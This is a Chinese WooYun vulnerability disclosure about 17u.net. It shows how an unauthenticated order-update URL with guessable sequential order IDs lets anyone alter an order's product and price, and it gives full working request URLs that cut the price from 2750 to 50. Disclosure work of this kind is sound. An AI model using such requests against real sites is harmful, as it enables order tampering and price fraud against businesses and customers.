WooYun.org

首先注册一个号码：13111112343，然后正常下单：

到订单里面点查看订单：

点击返回修改

点提交

抓包

重点就在这条url:
http://www.17u.net/WDHandler/LineOrder.ashx?action=updateLine&Platform=net&lineid=4593689&b2bMemberId=207967&TotalPrice=2750.00&TotalMan=1&TotalChild=0&b2cname=13111112343&b2cphone=13111112343&b2cemail=&remark=&dateText=2015-3-19%200:00:00&orderid=254831
经过测试，这条url，可以在不登录的情况下更新订单，也就是只要知道orderid，就可以更新订单，更重要的是orderid是自增值，很容易推测orderid号
接下来，我们来更改我刚才下的单，从上面的url里面有两个地方一个是lineid，一个是totalprice，这两个经过尝试是要与网站里面已有的产品一样的，所以我找了一个便宜的产品，

这个产品的id是1806901，价格是50，
然后拿出上面记录的url，修改
http://www.17u.net/WDHandler/LineOrder.ashx?action=updateLine&Platform=net&lineid=1806901&b2bMemberId=207967&TotalPrice=50&TotalMan=1&TotalChild=0&b2cname=13111112343&b2cphone=13111112343&b2cemail=&remark=&dateText=2015-3-19%200:00:00&orderid=254831
然后执行一下，随便在哪执行都行，然后再到订单里面看我们的订单
,已经变成50块了，

但毕竟是预定，有人为审核在里面，所以即便改了，也没什么大碍，但从程序上来讲，感觉应该算是个bug.先这样吧